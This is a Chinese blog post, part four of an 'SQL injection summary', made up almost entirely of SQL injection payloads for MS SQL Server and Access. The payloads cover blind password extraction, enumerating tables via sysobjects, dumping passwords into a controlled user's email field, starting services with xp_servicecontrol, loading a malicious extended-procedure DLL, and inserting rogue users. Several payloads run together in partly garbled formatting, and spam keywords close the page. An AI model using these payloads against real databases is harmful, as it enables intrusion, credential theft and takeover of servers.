2. 技术人生
    3. SQL注射总结(4)

    SQL注射总结(4)

    技术2022-05-11  114

    传统查询构造:

    select * FROM news where id=... AND topic=... AND .....admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'select 123;--;use master;--

    :a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。'and 1<>(select count(email) from [user]);--;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--  说明:  上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。  通过查看ffff的用户资料可得第一个用表叫ad  然后根据表名ad得到这个表的ID

    ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

      象下面这样就可以得到第二个表的名字了

    ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--ffff';update [users] set email=(select top 1 pwd from password where id=2)where name='ffff';--ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server'sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll'

      扩展存储就可以通过一般的方法调用:

    exec xp_webserver

      一旦这个扩展存储执行过,可以这样删除它:

    sp_dropextendedproc 'xp_webserver' insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-insert into users values( 667,123,123,0xffff)-insert into users values ( 123, 'admin''--', 'password', 0xffff)-;and user>0;;and (select count(*) from sysobjects)>0;;and (select count(*) from mysysobjects)>0 //为access数据库

    关键字:软件  服务器  qq  os  msn  dos   美女 电影 小说 音乐 无极 汽车 MP3

    专利

    最新回复(0)